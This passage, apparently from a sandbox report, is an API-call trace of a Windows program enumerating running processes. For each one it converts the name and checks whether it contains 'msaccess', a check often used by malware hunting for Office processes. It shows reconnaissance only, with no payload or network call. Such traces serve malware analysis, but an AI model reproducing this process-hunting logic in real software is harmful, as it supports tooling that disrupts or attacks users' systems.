lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0097.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.066] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3576178 [0097.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3576178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0097.066] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0097.066] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="msaccess") returned 0x0 [0097.066] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0097.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.068] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35762f8 [0097.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35762f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0097.068] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0097.068] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="msaccess") returned 0x0 [0097.068] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.070] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576130 [0097.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576130, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.070] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.070] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.070] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0097.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0097.071] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574c80 [0097.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574c80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0097.071] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0097.071] StrStrIA (lpFirst="dwm.exe", lpSrch="msaccess") returned 0x0 [0097.071] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.072] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35762e0 [0097.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35762e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.072] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.073] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.073] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.074] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576310 [0097.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.074] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.074] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.074] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.075] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576340 [0097.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576340, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.075] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.076] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.076] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.077] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576358 [0097.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576358, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.077] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.077] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.077] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.078] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576388 [0097.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576388, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.078] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.078] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.078] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.080] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35761c0 [0097.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35761c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.080] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.080] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.080] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.091] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35760a0 [0097.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35760a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.091] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.091] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.091] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.092] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35760b8 [0097.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35760b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.093] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.093] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.093] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.094] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576100 [0097.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576100, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.094] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.094] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.094] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.095] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576148 [0097.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576148, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.095] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.095] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.095] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0097.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.097] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576190 [0097.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3576190, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0097.097] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0097.097] StrStrIA (lpFirst="spoolsv.exe", lpSrch="msaccess") returned 0x0 [0097.097] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.099] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35761a8 [0097.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35761a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.099] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.099] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.099] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0097.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.100] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35761d8 [0097.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x35761d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0097.100] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0097.100] StrStrIA (lpFirst="audiodg.exe", lpSrch="msaccess") returned 0x0 [0097.100] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0097.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.101] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35763b8 [0097.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x35763b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0097.101] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0097.102] StrStrIA (lpFirst="sihost.exe", lpSrch="msaccess") returned 0x0 [0097.102] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.103] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35763d0 [0097.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35763d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.103] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.103] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.103] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.104] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3576598 [0097.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3576598, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0097.104] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0097.104] StrStrIA (lpFirst="taskhostw.exe", lpSrch="msaccess") returned 0x0 [0097.105] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0097.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.106] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576670 [0097.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3576670, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0097.106] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0097.106] StrStrIA (lpFirst="explorer.exe", lpSrch="msaccess") returned 0x0 [0097.106] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0097.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.107] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35755c0 [0097.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x35755c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0097.107] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0097.107] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="msaccess") returned 0x0 [0097.108] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0097.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0097.109] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b7a8 [0097.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356b7a8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0097.109] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0097.109] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="msaccess") returned 0x0 [0097.109] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, 